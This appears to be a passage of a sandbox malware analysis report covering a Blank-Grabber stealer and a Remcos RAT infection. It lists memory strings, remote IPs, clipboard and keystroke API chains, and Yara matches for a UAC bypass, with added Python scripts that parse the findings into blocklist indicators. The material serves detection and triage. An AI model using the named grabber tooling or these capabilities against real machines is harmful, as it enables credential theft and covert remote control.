                        Source: DE5A.exe, 00000016.00000002.2466580305.000001F0127A5000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2466223429.000001F01232A000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495670769.000001E8E7A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 65.108.69.93:443 -> 192.168.2.4:49743 version: TLS 1.2
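
The URL strings above mix three kinds of material: attacker tooling (the Blank-Grabber repository, the Discord user API), library residue carried in by the embedded Python runtime (python.org, urllib3, OpenSSL, certificate CPS links), and ordinary explorer.exe state (MSN feed URLs). The following Python script is an added example for triaging such output; it is not part of this report or of Joe Sandbox. It parses the report's own line format (the text export fuses the Source cell with the finding, so the parser expects "...sdmpString found in binary or memory:"), drops benign URL prefixes, folds the one or two trailing bytes that memory-lifted strings often carry (Blank-Grabberi, image.pngpo) onto the clean URL, and keys the result by image name and process index. Reading the first field of a memory-dump identifier as the hexadecimal process index (0000002E = 46, 00000016 = 22) is consistent with this report's entries but is an assumption about the naming scheme; the benign prefix list is an analyst choice, not a report artefact.

```python
import re
from collections import defaultdict

# Lines copied from this report (sample input, not invented).
SAMPLE_LINES = [
    "Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/",
    "Source: DE5A.exe, 00000016.00000002.2466911052.000001F012810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/f4kedre4lity/Blank-Grabber",
    "Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/f4kedre4lity/Blank-Grabberi",
    "Source: DE5A.exe, 0000002E.00000002.2580469572.000001E8E71F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.pngpo",
    "Source: DE5A.exe, 00000016.00000002.2466473798.000001F012510000.00000004.00001000.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2580469572.000001E8E71F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/f4kedre4lity/Blank-Grabber/main/.github/workflows/image.png",
    "Source: explorer.exe, 00000012.00000000.2004825375.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed",
    "Source: DE5A.exe, 00000016.00000002.2468316461.000001F0130B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539",
    "Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49731 version: TLS 1.2",
    "Source: unknownHTTPS traffic detected: 65.108.69.93:443 -> 192.168.2.4:49743 version: TLS 1.2",
]

STRING_RE = re.compile(
    r"^Source: (?P<sources>.+?\.sdmp)String found in binary or memory: (?P<url>\S+)$")
# One "image, dump-id" pair; a line may list several pairs separated by ", ".
SOURCE_RE = re.compile(r"(?P<image>[^,\s]+), (?P<dump>[0-9A-F]{8}(?:\.[0-9A-F]+)+\.sdmp)")
TLS_RE = re.compile(
    r"^Source: unknownHTTPS traffic detected: (?P<rip>[\d.]+):(?P<rport>\d+) -> "
    r"[\d.]+:\d+ version: (?P<ver>.+)$")

# Prefixes, not bare domains: github.com/python/... is runtime residue,
# github.com/f4kedre4lity/... is the grabber's own repository. Analyst-chosen list (assumption).
BENIGN_PREFIXES = (
    "https://www.msn.com", "https://cdn.query.prod.cms.msn.com",
    "https://img-s-msn-com.akamaized.net", "https://img.s-msn.com",
    "https://docs.python.org", "https://www.python.org", "https://peps.python.org",
    "https://github.com/python/", "https://github.com/urllib3/", "https://urllib3.readthedocs.io",
    "https://foss.heptapod.net", "https://www.openssl.org", "https://tools.ietf.org",
    "https://json.org", "https://html.spec.whatwg.org",
    "https://sectigo.com", "https://d.symcb.com", "https://www.globalsign.com",
)


def parse_sources(field):
    """'DE5A.exe, 0000002E....sdmp, DE5A.exe, 00000016....sdmp' -> [(image, proc_index, dump)].
    The leading 8 hex digits of a dump id are taken as the process index (assumption)."""
    return [(m["image"], int(m["dump"][:8], 16), m["dump"]) for m in SOURCE_RE.finditer(field)]


def canonical(url, known):
    """Strings lifted from memory often drag in 1-2 bytes of adjacent data
    ('...Blank-Grabberi', '...image.pngpo'); fold them onto a known clean URL."""
    for k in (1, 2):
        if url[:-k] in known:
            return url[:-k]
    return url


def triage(lines):
    """Return ({(image, proc_index): {url, ...}}, [remote ip:port, ...]) with benign URLs removed."""
    hits, remote = [], []
    for line in lines:
        m = STRING_RE.match(line)
        if m:
            if not m["url"].startswith(BENIGN_PREFIXES):
                for image, proc, _dump in parse_sources(m["sources"]):
                    hits.append(((image, proc), m["url"]))
            continue
        t = TLS_RE.match(line)
        if t:
            remote.append(f"{t['rip']}:{t['rport']}")
    known = {url for _, url in hits}          # fold bleed against all processes, not just one
    iocs = defaultdict(set)
    for key, url in hits:
        iocs[key].add(canonical(url, known))
    return dict(iocs), remote


if __name__ == "__main__":
    iocs, peers = triage(SAMPLE_LINES)
    for (image, proc), urls in sorted(iocs.items()):
        print(f"{image} (process index {proc}):")
        for url in sorted(urls):
            print("   ", url)
    print("TLS peers:", peers)
```

Run against this report's full string list the same way; the two DE5A.exe instances (indices 22 and 46) collapse onto the same handful of grabber URLs, while the explorer.exe entries disappear entirely, which is what you want before copying indicators into a blocklist.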

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: Yara matchFile source: 0000000F.00000002.2017597409.0000000000901000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeCode function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405582
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00A0F7C7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A0F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00A0F7C7
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,20_2_001BF7C7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00A0F55C
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FA635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_009FA635
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A29FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00A29FD2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A29FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00A29FD2
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,20_2_001D9FD2
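
The Code function entries above list the API sequence of each flagged function, keyed by process index, phase and virtual address. Two things are worth pulling out of them: which capability each chain actually implies (OpenClipboard followed by SetClipboardData is a clipboard write; GetAsyncKeyState in a loop is keystroke polling; GetKeyState inside a DefDlgProcW/TrackPopupMenuEx chain is ordinary dialog handling and not evidence of a keylogger), and that the same function turns up in more than one process: 00A0F7C7 in End.pif and 001BF7C7 in wsruwii share their low 16 bits and an identical API sequence, which is what a relocated copy of the same binary looks like. The Python below is an added example, not part of this report or of Joe Sandbox. It parses the report's line format, tags each chain with capabilities, and groups functions across processes; the capability rules are analyst-defined, and the relocation heuristic assumes 64 KiB-aligned image bases so that an address's low 16 bits survive relocation.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# "Code function" lines copied from this report (sample input, not invented).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00A0F7C7",
    r"Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_00A0F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00A0F7C7",
    r"Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,20_2_001BF7C7",
    r"Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A0F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00A0F55C",
    r"Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FA635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_009FA635",
    r"Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00A29FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00A29FD2",
    r"Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_001D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,20_2_001D9FD2",
]

# Source path is fused with "Code function:"; the function id is repeated after the API list.
FUNC_RE = re.compile(
    r"^Source: (?P<path>.+?)Code function: "
    r"(?P<fid>(?P<proc>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-F]+)) "
    r"(?P<apis>[A-Za-z0-9_,]+?),(?P=fid)$")

# Analyst-defined rules (assumption): every API in the set must appear in the chain.
# GetKeyState on its own is left out on purpose; dialog procedures call it constantly.
CAPABILITIES = {
    "clipboard-write": {"OpenClipboard", "SetClipboardData"},
    "clipboard-read": {"OpenClipboard", "GetClipboardData"},
    "keystroke-poll": {"GetAsyncKeyState"},
}


def parse_function(line):
    """One report line -> dict(image, proc, phase, addr, apis) or None if it is not a Code function line."""
    m = FUNC_RE.match(line)
    if not m:
        return None
    return {"image": PureWindowsPath(m["path"]).name, "proc": int(m["proc"]),
            "phase": int(m["phase"]), "addr": int(m["addr"], 16),
            "apis": m["apis"].split(",")}


def capabilities(apis):
    present = set(apis)
    return sorted(name for name, need in CAPABILITIES.items() if need <= present)


def shared_code(funcs):
    """Group by (addr & 0xFFFF, API sequence). With 64 KiB-aligned image bases the low 16 bits
    survive relocation, so equal offsets plus equal sequences mean the same function in another process."""
    groups = defaultdict(set)
    for f in funcs:
        groups[(f["addr"] & 0xFFFF, tuple(f["apis"]))].add((f["image"], f["proc"]))
    return {f"{off:04X}": sorted(members)
            for (off, _apis), members in groups.items() if len(members) > 1}


def report(lines):
    """Return ({function id: (image, [capabilities])}, {offset: [(image, proc), ...]})."""
    funcs = [f for f in map(parse_function, lines) if f]
    tagged = {f"{f['proc']}_{f['phase']}_{f['addr']:08X}": (f["image"], capabilities(f["apis"]))
              for f in funcs}
    return tagged, shared_code(funcs)


if __name__ == "__main__":
    tagged, shared = report(SAMPLE_LINES)
    for fid, (image, caps) in tagged.items():
        print(f"{fid:16} {image:10} {', '.join(caps) or '(gui plumbing only)'}")
    for off, members in shared.items():
        print(f"offset ...{off}: same function in {members}")
```

On this input the clipboard-write function is reported once per process it lives in (End.pif twice, wsruwii once), the 9FD2 dialog procedure gets no capability tag despite its four GetKeyState calls, and the offset grouping ties wsruwii back to End.pif without any file hashing.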

                        E-Banking Fraud

                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2904070426.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
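
The Yara hits above name the same process in three different ways: memory dumps by an eight-digit hex index (00000042), unpacked images by a decimal index and image name (66.2.WindowsUpdateServices.exe.630000.1.unpack), and whole process memory by PID (bound.exe PID: 1860), plus the dropped file by path. The Python below is an added example, not part of this report or of Joe Sandbox, that folds all of these, together with the Matched rule lines from the System Summary that follows, into a single per-process view. Reading 00000042 as process index 66, 0000003D as 61 and 00000043 as 67 is consistent with the image names this report attaches to those indices (WindowsUpdateServices.exe, bound.exe, iexplore.exe); treating the hex-to-decimal correspondence as a general convention is an assumption.

```python
import re
from collections import defaultdict

# Lines copied from this report (sample input, not invented).
SAMPLE_LINES = [
    "Source: Yara matchFile source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE",
    "Source: Yara matchFile source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE",
    "Source: Yara matchFile source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara matchFile source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara matchFile source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR",
    r"Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED",
    "Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown",
    "Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown",
]

YARA_RE = re.compile(r"^Source: Yara matchFile source: (?P<src>.+), type: (?P<kind>[A-Z]+)$")
RULE_RE = re.compile(
    r"^Source: (?P<src>.+), type: (?P<kind>[A-Z]+)Matched rule: (?P<rule>\S+) Author: (?P<author>.+)$")
# <proc>.<phase>.<image>.<base>.<n>[.raw].unpack ; image may itself contain dots
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<phase>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack$")
DUMP_RE = re.compile(r"^(?P<proc>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.")
PIDSTR_RE = re.compile(r"^Process Memory Space: (?P<image>\S+) PID: (?P<pid>\d+)$")


def locate(src):
    """One source string -> (process key, image or None, phase or None, evidence form)."""
    m = UNPACK_RE.match(src)
    if m:
        return int(m["proc"]), m["image"], int(m["phase"]), "unpacked"
    m = DUMP_RE.match(src)
    if m:  # hex index and phase (assumption: same numbering as the unpack names)
        return int(m["proc"], 16), None, int(m["phase"], 16), "memory"
    m = PIDSTR_RE.match(src)
    if m:  # no process index on these lines, only the OS PID
        return f"pid:{m['pid']}", m["image"], None, "memory-strings"
    return f"file:{src}", src.rsplit("\\", 1)[-1], None, "dropped"


def process_view(lines):
    """Merge Yara hit sources and Matched rule lines into {process key: {image, phases, forms, rules}}."""
    view = defaultdict(lambda: {"image": None, "phases": set(), "forms": set(), "rules": set()})
    for line in lines:
        m = YARA_RE.match(line) or RULE_RE.match(line)
        if not m:
            continue
        key, image, phase, form = locate(m["src"])
        entry = view[key]
        if image:                     # dump ids carry no name; take it from the unpack entries
            entry["image"] = image
        if phase is not None:
            entry["phases"].add(phase)
        entry["forms"].add(form)
        if "rule" in m.groupdict():
            entry["rules"].add(m["rule"])
    return dict(view)


if __name__ == "__main__":
    for key, e in process_view(SAMPLE_LINES).items():
        print(f"{key!s:12} {e['image'] or '?':28} phases={sorted(e['phases'])} "
              f"forms={sorted(e['forms'])} rules={sorted(e['rules'])}")
```

The point of the join is the memory-only hits: a MEMORY match on 00000043 says nothing by itself, but once index 67 is tied to iexplore.exe via the unpack name it reads as the injected Remcos image in a browser process, matching the report's own "Injects a PE file into a foreign processes" signature.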

                        System Summary

                        Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants | Author: unknown
                        Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
                        Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
